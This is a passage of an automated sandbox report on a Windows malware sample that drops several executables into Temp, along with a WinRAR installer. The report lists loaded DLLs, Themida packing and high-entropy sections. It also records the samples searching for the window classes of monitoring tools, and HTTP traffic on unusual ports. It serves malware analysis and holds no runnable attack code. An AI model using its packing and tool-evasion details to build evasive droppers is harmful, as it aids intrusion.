                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: ndfapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: wdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: KR6CT3hIxT.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: KR6CT3hIxT.exeStatic file information: File size 7616416 > 1048576
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: KR6CT3hIxT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: KR6CT3hIxT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4.exe, 00000001.00000000.1688378562.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, 4.exe, 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, rdegje.exe, 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe, 00000006.00000000.1938407320.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe.2.dr, 4.exe.0.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar-x64-701.exe.0.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: KR6CT3hIxT.exe
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 3.exe, 00000002.00000002.4149852444.0000000000F20000.00000040.00000001.01000000.0000000A.sdmp, r.exe, 00000007.00000002.2159322752.0000000000E30000.00000040.00000001.01000000.0000000D.sdmp
                  Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64-701.exe.0.dr
                  Source: KR6CT3hIxT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: KR6CT3hIxT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: KR6CT3hIxT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: KR6CT3hIxT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: KR6CT3hIxT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\3.exeUnpacked PE file: 2.2.3.exe.f10000.0.unpack :ER;.rsrc:R;.reloc:R;.imports:W;.themida:EW;.boot:ER; vs :ER;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\r.exeUnpacked PE file: 7.2.r.exe.e10000.0.unpack :ER;.rsrc:R;.reloc:R;.imports:W;.themida:EW;.boot:ER; vs :ER;.rsrc:R;
                  Source: r.exe.6.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5080953Jump to behavior
                  Source: KR6CT3hIxT.exeStatic PE information: section name: .didat
                  Source: KR6CT3hIxT.exeStatic PE information: section name: _RDATA
                  Source: 4.exe.0.drStatic PE information: section name: .didat
                  Source: winrar-x64-701.exe.0.drStatic PE information: section name: .didat
                  Source: winrar-x64-701.exe.0.drStatic PE information: section name: _RDATA
                  Source: 3.exe.1.drStatic PE information: section name:
                  Source: 3.exe.1.drStatic PE information: section name: .imports
                  Source: 3.exe.1.drStatic PE information: section name: .themida
                  Source: 3.exe.1.drStatic PE information: section name: .boot
                  Source: rdegje.exe.2.drStatic PE information: section name: .didat
                  Source: r.exe.6.drStatic PE information: section name:
                  Source: r.exe.6.drStatic PE information: section name: .imports
                  Source: r.exe.6.drStatic PE information: section name: .themida
                  Source: r.exe.6.drStatic PE information: section name: .boot
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF5166 push rsi; retf 0_2_00007FF7E1DF5167
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF5156 push rsi; retf 0_2_00007FF7E1DF5157
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B807F0 push ecx; ret 1_2_00B80803
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B7FEFC push eax; ret 1_2_00B7FF1A
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF07F0 push ecx; ret 6_2_00EF0803
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EEFEFC push eax; ret 6_2_00EEFF1A
                  Source: C:\Users\user\AppData\Local\Temp\r.exeCode function: 7_2_06FDE5C0 push es; ret 7_2_06FDE5D0
                  Source: 3.exe.1.drStatic PE information: section name: entropy: 7.961502728073197
                  Source: r.exe.6.drStatic PE information: section name: entropy: 7.975061725537987
                  Source: C:\Users\user\AppData\Local\Temp\3.exeFile created: C:\Users\user\AppData\Local\Temp\rdegje.exeJump to dropped file
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeFile created: C:\Users\user\AppData\Local\Temp\4.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\4.exeFile created: C:\Users\user\AppData\Local\Temp\3.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeFile created: C:\Users\user\AppData\Local\Temp\r.exeJump to dropped file
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeFile created: C:\Users\user\AppData\Local\Temp\winrar-x64-701.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow searched: window name: RegmonclassJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49740
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
